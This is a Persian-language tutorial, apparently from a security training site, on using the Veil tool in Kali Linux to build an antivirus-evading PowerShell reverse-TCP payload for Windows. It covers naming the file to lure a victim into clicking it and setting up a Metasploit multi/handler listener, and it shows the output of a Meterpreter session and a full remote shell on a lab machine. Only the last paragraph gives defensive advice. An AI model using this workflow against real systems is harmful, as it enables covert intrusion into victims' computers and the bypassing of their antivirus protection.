احسان امجدی
کارشناس امنیت اطلاعات و ارتباطات

آموزش ابزار Veil در کالی لینوکس | دور زدن آنتی ویروس ویندوز

همانطور که مباحث آموزش لینوکس کالی را دنبال میکنید، در این بخش میخواهیم علیرغم آموزش های پیشین که سیستم هدفمان را Metasploitable تشکیل میداد، سیستم هدف را یک ویندوز قرار دهیم و آنتی ویروس آن را دور بزنیم. پس با ما همراه باشید:

دوره های شبکه، برنامه نویسی، مجازی سازی، امنیت، نفوذ و ... با برترین های ایران
  • توجه: پیشنهاد میشود قبل از شروع این بحث با مطالعه آموزش های پیشین، مفاهیم payload، metasploit، shell را مرور نمایید.

بسیاری از مردم فکر میکنند اگر بر روی سیستمشان از آنتی ویروس و یا یک فایروال استفاده کنند، توانسته اند خود را بطور صد در صد از حملات هکر ها و آسیب های احتمالی ویروس ها و تروجان ها در امان نگه دارند. اما حقیقت چیزی غیر از این را میگوید.

در این جا میخواهیم شما را با نرم افزاری آشنا کنیم که میتواند با قابلیت های خود آنتی ویروس و فایروال را دور بزند. نرم افزار "Veil" یک تولید کننده payload در ریموت شل است که میتواند بسیاری از برنامه های آنتی ویروس فعلی را دور بزند. همانطور که میدانید یک بخش مهم در تست های نفوذ، از میان بر داشتن آنتی ویروس است که برای اجرای سناریو نفوذ مزاحمت ایجاد میکند! ابزار "Veil" یکی از راه هایی است که میتوانیم با آن این کار را انجام دهیم.

  • نکته: payload ها بشما این امکان را میدهند تا بتوانید کاری موثر بر روی سیستم مورد نفوذ قرار گرفته انجام بدهید Metasploit . در کالی بهمراه تعداد زیادی از payload های متفاوت ارائه شده است که میتوانید از هرکدام از آن ها استفاده کنید.

بسیاری از برنامه های آنتی ویروس با الگوها یا تطابق امضاهای دیجیتالی کار میکنند. اگر یک برنامه ظاهری شبیه به برنامه های مخرب داشته باشد، آنتی ویروس طوری برنامه ریزی شده است تا بدنبال آن بگردد و آن را شکار کند. حال اگر فایل آلوده دارای امضایی باشد که آنتی یوروس تا بحال با آن برخورد نکرده باشد، در این حالت بسیاری از آنتی ویروس ها فایل را یک فایل صحیح دانسته و احتمال آلوده بودن از روی آن برداشته میشود. بنابراین اگر شما بتوانید امضای یک برنامه مخرب را تغییر دهید و یا با امضایی معتبر چهره اش را عوض کنید (در اینجا منظور از برنامه مخرب یک ریموت شل است)، اکثر آنتی ویروس ها به آن برنامه اجازه اجرا خواهند داد و هکر میتواند ارتباط ریموت با سیستم برقرار کند.

"veil" یک تولید کننده Payload است که توسط متخصصان امنیتی و هکرهای کلاه سیاه در آمریکا بوجود آمده است. این برنامه یک payload استاندارد برای Metasploit تحویل میدهد و از طریق Metasploit مانند یک برنامه بشما این امکان را میدهد تا Payload های مختلفی را بسازید که اکثر ان ها آنتی ویروس ها را دور میزنند.

آموزش نصب Veil در کالی لینوکس

اخیرا برنامه veil به کالی اضافه شده است. بر خلاف اکثر برنامه های موجود در کالی اگر عبارت "veil" را در محیط ترمینال تایپ کنید، به معنی شروع برنامه نیست؛ چرا که هنوز ممکن است بطور کامل نصب نشده باشد.

1. برای نصب این برنامه باید عبارت زیر تایپ کنید:

root@kali:/usr/share# Apt-get update && apt-get install veil

2. حالا برای اجرای برنامه عبارت veil را تایپ کنید:

root@kali:/usr/share# veil

منوی اصلی بشما نشان داده میشود:

وب سایت توسینسو

آموزش استفاده از Veil در کالی لینوکس

اولین چیزی که باید انجام دهید، لیست کردن payload های موجود با استفاده از دستور "List" است:

وب سایت توسینسو

نکته: تا زمانی که در آموزش های آتی درباره حملات power shell صحبت خواهیم کرد، برای انجام کار از یک power shell payload استفاده کنید.

برای استفاده باید از دستور "use" و شماره payload مورد نظر استفاده کرد. در این آموزش ما از payload زیر استفاده خواهیم نمود:

Powershell/virtualAlloc

1. دستور "use 9" را تایپ کنید.

این دستور payload مورد نظر را انتخاب کرده و ما را با صفحه زیر روبرو میکند:

وب سایت توسینسو

2. از آنجایی که ما در این آموزش با مقادیر پیش فرض کار میکنیم، با دستورهای نشان داده شده کاری نداریم؛ بنابراین دستور"generate" را تایپ میکنیم.

در این مرحله شما میتوانید شل کد استاندارد Metasploit یعنی msfvenom را اجرا کنید و یا انتخاب خود را داشته باشید. در اینجا ما پیش فرض یعنی msfvenom را انتخاب میکنیم:

3. شماره "1" را تایپ کرده و اینتر را میزنیم:

وب سایت توسینسو

در مرحله بعد باید نوع شل را انتخاب کنیم؛ در اینجا نیز از پیش فرض استفاده میکنیم که reverse_TCP است. این نوع شل به این معنی است که سیستم هدف شروع کننده یک ارتباط با ما خواهد بود.

4. فقط کافیست که اینتر را بفشارید تا مقدار payload پیش فرض شل انتخاب گردد:

وب سایت توسینسو

5. در اینجا برنامه Veil از شما در رابطه با آدرس IP سیستمی که از آن استفاده میکنید، میپرسد. آدرس IP سیستم کالی را وارد کرده و اینتر را بفشارید.

وب سایت توسینسو

6. پس از وارد کردن آدرس IP سیستم کالی نوبت وارد کردن پورت لوکالی است که از آن استفاده میکنید. ما پورت 4000 را برای کار انتخاب میکنیم:

وب سایت توسینسو

7. پس از این مرحله از شما در رابطه با وارد کردن آپشن های MSFVenom که میخواهید استفاده کنید، سوال میشود؛ ما از هیچ آپشن خاصی استفاده نخمیکنیم. بنابراین با فشردن کلید اینتر، این مرحله را رد میکنیم.

کار بدرستی انجام شد! برنامه Veil شل کد مورد نظر ما را با آپشن هایی که انتخاب کرده بودیم، تولید کرد.

8. حالا نیاز داریم تا بر روی فایل ایجاد شده نام بگذاریم. ما نام "CutePuppy" را انتخاب میکنیم.

وب سایت توسینسو

بسیار خوب؛ هرچند که نام "Cute puppy" (به معنای توله سگ ناز) کمی عجیب و غریب به نظر میرسد، اما بیاد داشته باشید هدف این است که کاربر در سیستم هدف بر این فایل کلیک کند؛ بنابراین اگر میدانید که کاربر هدف به "توله سگ" ها علاقه‌مند است، انتخاب نام "cute puppy" مناسب و زیرکانه خواهد بود. اجباری در انتخاب این نام نیست و شما میتوانید هر نامی را که فکر میکنید کاربر سیستم هدف را ترغیب به کلیک میکند، انتخاب کنید.

Veil تمام آن چیزهایی را که نیاز داشت، در اختیار دارد و فایل تله گذاری شده ما آماده شده است.

وب سایت توسینسو

فایل ما در مسیر "//usr//share//veil//output//source//" ذخیره شده است. در مرحله بعد باید از آن یک فایل bat. بسازیم و بسوی مقصد ارسال کنیم. هنگامی که این فایل اجرا شد، سعی خواهد کرد تا باسیستم کالی ما ارتباط برقرار کند. پس ما نیاز داریم برای قبول ارتباط از سیستم هدف یک برنامه شنود را اجرا کنیم. در قسمت بعد از این آموزش نحوه قبول ارتباط از سیستم هدف و شل گرفتن بصورت ریموت را برایتان توضیح میدهیم.

در قسمت پیش ابزاری را بشما معرفی کردیم که بوسیله استفاده از آن میتوانستیم فایروال و آنتی ویروس را دور بزنیم. به منظور آمادگی داشتن برای شروع قسمت دوم در اینجا خلاصه ای از بخش اول را برای شما می آوریم و قسمت دوم را شروع میکنیم:

نرم افزار "Veil" یک تولید کننده payload در ریموت شل است که میتواند بسیاری از برنامه های آنتی ویروس فعلی را دور بزند. این برنامه یک payload استاندارد برای Metasploit تحویل میدهد و از طریق Metasploit مانند یک برنامه بشما این امکان را میدهد تا Payload های مختلفی را بسازید که اکثر آن ها آنتی ویروس ها را دور میزنند.

در ادامه نرم افزار veil را نصب و مورد استفاده قرار دادیم؛ در نهایت برنامه Veil شل کد مورد نظر ما را با آپشن هایی که انتخاب کرده بودیم، تولید کرد؛ بر روی فایل اسم گذارده و نسخه .bat را از آن میسازیم. سپس فایل را به سیستم هدف انتقال داده تا کاربر قربانی بر روی آن کلیک کند. کاری که این فایل انجام میدهد این است که یک ارتباط ریموت شل را از طرف سیستم مقصد بسمت سیستم کالی (حمله کننده) برقرار میکند.

آموزش گرفتن شل از راه دور

پس از اجرای فایل .bat نیاز به یک برنامه شنود داریم تا بتواند ارتباطی را که از سوی سیستم قربانی برقرار میشود، قبول کند. برای ایجاد برنامه کنترل از راه دور، باید از Metasploit استفاده کنیم.

    1. پلت فرم Metasploit را با استفاده از منو و یا محیط ترمینال (mfsconsole) اجرا میکنیم.
    2. حالا طبق فرمان های زیر، برنامه کنترل از راه دور را تنظیم میکنیم:
Msf > use multi/handler
Msf exploit(handler) > set payload windows/Meterpreter/reverse_tcp
Payload => windows/Meterpreter/reverse_tcp
Msf exploit(handler) > set lhost 192.168.198.137
Lhost => 192.168.198.137
Msf exploit(handler) > set lport 4000
Lport => 4000
Msf exploit(handler) > exploit

مطمئن شوید که آدرس IP سیستم کالی و پورت برای برنامه veil را بدرستی وارد کرده اید. ایندو باید دقیقا با داده هایی که از قبل وارد کردیم یکسان باشند.پس از آن با وارد کردن فرمان "exploit" که در بالا مشاهده کردید، Metasploit برنامه کنترل کننده را اجرا کرده و منتظر ارتباط میماند.

[*] Started reverse handler on 192.168.198.137:4000
[*] Starting the payload handler …

حالا نیاز داریم تا قربانی فایل تولید شده را که در بخش قبلا ایجاد و به سیستم مقصد منتقل کردیم، را اجرا کند.

وب سایت توسینسو

در سیستمی که پلت فرم آن ویندوز 7 باشد، اگر فایل اجرا شود، بر روی سیستم کالی خود شاهد فرآیند زیر خواهیم بود:

[*] Started reverse handler on 192.168.198.137:4000
[*] Starting the payload handler …
[*] Sending stage (752128 bytes) to 192.168.198.132
[*] Meterpreter session 1 opened (192.168.198.137:4000 -> 192.168.198.132:49209) 
at 2015-04-11 18:55:43  -0400

Meterpreter >  

همانطور که میبینید یک ارتباط شل در جهت عکس (از سیستم قربانی به سیستم حمله کننده) برقرار گردید! حالا اگر عبارت "shell" را تایپ کنیم، خواهیم دید که ما الان یک ریموت شل با اختیارات کامل را در اختیار داریم:

Meterpreter > shell
Process 216 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\Ehsan\Desktop >

این نکته بما آموخت که نمیتوان بطور صد در صد به فایروال و آنتی ویروس به عنوان تنها راه های محافظت از سیستم اکتفاء کرد. متاسفانه در اکثر مواقع امنیت شبکه شما به کاربران و این که چه کارهایی را مجاز به انجام هستند، دارد.به کاربران خود آموزش دهید که هرگز برنامه ها و فایل هایی را که بطور ناخواسته از طریق ایمیل به سیستم وارد شده است را باز نکنند. همچنین جلوگیری از اجرا و ورود و خروج برخی فایل ها با پسوندهای خاص هم میتواند ایده خوبی باشد.در نهایت استفاده از سیستم امنیتی مانیتورینگ شبکه بما کمک میکند تا آن چیزی را که اتفاق می افتد و آن چیزی که امنیت شبکه را بخطر می اندازد را پیگیری و رصد کنیم.


احسان امجدی
احسان امجدی

کارشناس امنیت اطلاعات و ارتباطات

احسان امجدی ، مشاور امنیت اطلاعات و ارتباطات و تست نفوذ سنجی ، هکر کلاه سفید ، مدرس دوره های تخصصی امنیت اطلاعات و شبکه ، تخصص در حوزه های سرویس های مایکروسافت ، Routing و Switching ، مجازی سازی ، امنیت اطلاعات و تست نفوذ ، کشف جرائم رایانه ای و سیستم عامل لینوکس ، متخصص در حوزه SOC و ...

نظرات